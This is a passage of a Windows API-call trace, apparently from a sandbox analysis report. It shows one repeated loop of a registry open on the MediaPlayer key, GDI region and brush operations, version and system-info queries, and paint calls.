(TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.567] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.567] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x44040713 [0017.567] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3a04027d [0017.567] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a84 [0017.568] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a85 [0017.568] CombineRgn (hrgnDst=0x1040a84, hrgnSrc1=0x44040713, hrgnSrc2=0x3a04027d, iMode=1) returned 1 [0017.568] CombineRgn (hrgnDst=0x1040a85, hrgnSrc1=0x44040713, hrgnSrc2=0x3a04027d, iMode=4) returned 2 [0017.568] CreateSolidBrush (color=0xff) returned 0x2100a83 [0017.568] CreateSolidBrush (color=0xff0000) returned 0x1100a86 [0017.568] DeleteObject (ho=0x1100a86) returned 1 [0017.568] DeleteObject (ho=0x3a04027d) returned 1 [0017.568] DeleteObject (ho=0x44040713) returned 1 [0017.568] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.568] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.568] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.568] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.568] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.568] BeginPath (hdc=0x0) returned 0 [0017.568] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.568] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.568] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.568] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.568] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.568] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.568] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.568] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.568] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3b04027d [0017.568] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x45040713 [0017.568] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a87 [0017.568] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a88 [0017.568] CombineRgn (hrgnDst=0x1040a87, hrgnSrc1=0x3b04027d, hrgnSrc2=0x45040713, iMode=1) returned 1 [0017.568] CombineRgn (hrgnDst=0x1040a88, hrgnSrc1=0x3b04027d, hrgnSrc2=0x45040713, iMode=4) returned 2 [0017.568] CreateSolidBrush (color=0xff) returned 0x2100a86 [0017.568] CreateSolidBrush (color=0xff0000) returned 0x1100a89 [0017.568] DeleteObject (ho=0x1100a89) returned 1 [0017.569] DeleteObject (ho=0x45040713) returned 1 [0017.569] DeleteObject (ho=0x3b04027d) returned 1 [0017.569] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.569] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.569] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.569] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.569] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.569] BeginPath (hdc=0x0) returned 0 [0017.569] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.569] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.569] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.569] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.569] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.569] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.569] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.569] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.569] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x46040713 [0017.569] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3c04027d [0017.569] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a8a [0017.569] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a8b [0017.569] CombineRgn (hrgnDst=0x1040a8a, hrgnSrc1=0x46040713, hrgnSrc2=0x3c04027d, iMode=1) returned 1 [0017.569] CombineRgn (hrgnDst=0x1040a8b, hrgnSrc1=0x46040713, hrgnSrc2=0x3c04027d, iMode=4) returned 2 [0017.569] CreateSolidBrush (color=0xff) returned 0x2100a89 [0017.569] CreateSolidBrush (color=0xff0000) returned 0x1100a8c [0017.569] DeleteObject (ho=0x1100a8c) returned 1 [0017.569] DeleteObject (ho=0x3c04027d) returned 1 [0017.569] DeleteObject (ho=0x46040713) returned 1 [0017.569] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.569] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.569] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.570] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.570] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.570] BeginPath (hdc=0x0) returned 0 [0017.570] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.570] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.570] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.570] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.570] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.570] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.570] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.570] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.570] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3d04027d [0017.570] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x47040713 [0017.570] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a8d [0017.570] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a8e [0017.570] CombineRgn (hrgnDst=0x1040a8d, hrgnSrc1=0x3d04027d, hrgnSrc2=0x47040713, iMode=1) returned 1 [0017.570] CombineRgn (hrgnDst=0x1040a8e, hrgnSrc1=0x3d04027d, hrgnSrc2=0x47040713, iMode=4) returned 2 [0017.570] CreateSolidBrush (color=0xff) returned 0x2100a8c [0017.570] CreateSolidBrush (color=0xff0000) returned 0x1100a8f [0017.570] DeleteObject (ho=0x1100a8f) returned 1 [0017.570] DeleteObject (ho=0x47040713) returned 1 [0017.570] DeleteObject (ho=0x3d04027d) returned 1 [0017.570] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.570] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.570] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.570] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.570] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.570] BeginPath (hdc=0x0) returned 0 [0017.570] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.570] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.570] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.570] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.570] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.571] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.571] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.571] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.571] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x48040713 [0017.571] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3e04027d [0017.571] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a90 [0017.571] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a91 [0017.571] CombineRgn (hrgnDst=0x1040a90, hrgnSrc1=0x48040713, hrgnSrc2=0x3e04027d, iMode=1) returned 1 [0017.571] CombineRgn (hrgnDst=0x1040a91, hrgnSrc1=0x48040713, hrgnSrc2=0x3e04027d, iMode=4) returned 2 [0017.571] CreateSolidBrush (color=0xff) returned 0x2100a8f [0017.571] CreateSolidBrush (color=0xff0000) returned 0x1100a92 [0017.571] DeleteObject (ho=0x1100a92) returned 1 [0017.571] DeleteObject (ho=0x3e04027d) returned 1 [0017.571] DeleteObject (ho=0x48040713) returned 1 [0017.571] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.571] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.571] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.571] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.571] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.571] BeginPath (hdc=0x0) returned 0 [0017.571] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.571] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.571] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.571] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.571] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.571] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.571] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.571] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.572] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3f04027d [0017.572] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x49040713 [0017.572] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a93 [0017.572] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a94 [0017.572] CombineRgn (hrgnDst=0x1040a93, hrgnSrc1=0x3f04027d, hrgnSrc2=0x49040713, iMode=1) returned 1 [0017.572] CombineRgn (hrgnDst=0x1040a94, hrgnSrc1=0x3f04027d, hrgnSrc2=0x49040713, iMode=4) returned 2 [0017.572] CreateSolidBrush (color=0xff) returned 0x2100a92 [0017.572] CreateSolidBrush (color=0xff0000) returned 0x1100a95 [0017.572] DeleteObject (ho=0x1100a95) returned 1 [0017.572] DeleteObject (ho=0x49040713) returned 1 [0017.572] DeleteObject (ho=0x3f04027d) returned 1 [0017.572] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.572] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.572] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.572] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.572] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.572] BeginPath (hdc=0x0) returned 0 [0017.572] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.572] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.572] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.572] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.572] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.572] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.572] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.572] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.572] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4a040713 [0017.572] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4004027d [0017.572] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a96 [0017.572] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a97 [0017.573] CombineRgn (hrgnDst=0x1040a96, hrgnSrc1=0x4a040713, hrgnSrc2=0x4004027d, iMode=1) returned 1 [0017.573] CombineRgn (hrgnDst=0x1040a97, hrgnSrc1=0x4a040713, hrgnSrc2=0x4004027d, iMode=4) returned 2 [0017.573] CreateSolidBrush (color=0xff) returned 0x2100a95 [0017.573] CreateSolidBrush (color=0xff0000) returned 0x1100a98 [0017.573] DeleteObject (ho=0x1100a98) returned 1 [0017.573] DeleteObject (ho=0x4004027d) returned 1 [0017.573] DeleteObject (ho=0x4a040713) returned 1 [0017.573] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.573] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.573] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.573] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.573] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.573] BeginPath (hdc=0x0) returned 0 [0017.573] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.573] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.573] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.573] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.573] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.573] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.573] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.573] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.573] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4104027d [0017.573] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4b040713 [0017.573] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a99 [0017.573] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a9a [0017.573] CombineRgn (hrgnDst=0x1040a99, hrgnSrc1=0x4104027d, hrgnSrc2=0x4b040713, iMode=1) returned 1 [0017.573] CombineRgn (hrgnDst=0x1040a9a, hrgnSrc1=0x4104027d, hrgnSrc2=0x4b040713, iMode=4) returned 2 [0017.573] CreateSolidBrush (color=0xff) returned 0x2100a98 [0017.573] CreateSolidBrush (color=0xff0000) returned 0x1100a9b [0017.573] DeleteObject (ho=0x1100a9b) returned 1 [0017.574] DeleteObject (ho=0x4b040713) returned 1 [0017.574] DeleteObject (ho=0x4104027d) returned 1 [0017.574] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.574] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.574] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.574] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.574] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.574] BeginPath (hdc=0x0) returned 0 [0017.574] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.574] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.574] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.574] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.574] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.574] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.574] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.574] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.574] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4c040713 [0017.574] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4204027d [0017.574] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a9c [0017.574] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a9d [0017.574] CombineRgn (hrgnDst=0x1040a9c, hrgnSrc1=0x4c040713, hrgnSrc2=0x4204027d, iMode=1) returned 1 [0017.574] CombineRgn (hrgnDst=0x1040a9d, hrgnSrc1=0x4c040713, hrgnSrc2=0x4204027d, iMode=4) returned 2 [0017.574] CreateSolidBrush (color=0xff) returned 0x2100a9b [0017.574] CreateSolidBrush (color=0xff0000) returned 0x1100a9e [0017.574] DeleteObject (ho=0x1100a9e) returned 1 [0017.574] DeleteObject (ho=0x4204027d) returned 1 [0017.574] DeleteObject (ho=0x4c040713) returned 1 [0017.574] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.574] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.575] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.575] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.575] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.575] BeginPath (hdc=0x0) returned 0 [0017.575] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.575] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.575] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.575] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.575] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.575] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.575] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.575] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.575] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4304027d [0017.575] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4d040713 [0017.575] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a9f [0017.575] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aa0 [0017.575] CombineRgn (hrgnDst=0x1040a9f, hrgnSrc1=0x4304027d, hrgnSrc2=0x4d040713, iMode=1) returned 1 [0017.575] CombineRgn (hrgnDst=0x1040aa0, hrgnSrc1=0x4304027d, hrgnSrc2=0x4d040713, iMode=4) returned 2 [0017.575] CreateSolidBrush (color=0xff) returned 0x2100a9e [0017.575] CreateSolidBrush (color=0xff0000) returned 0x1100aa1 [0017.575] DeleteObject (ho=0x1100aa1) returned 1 [0017.575] DeleteObject (ho=0x4d040713) returned 1 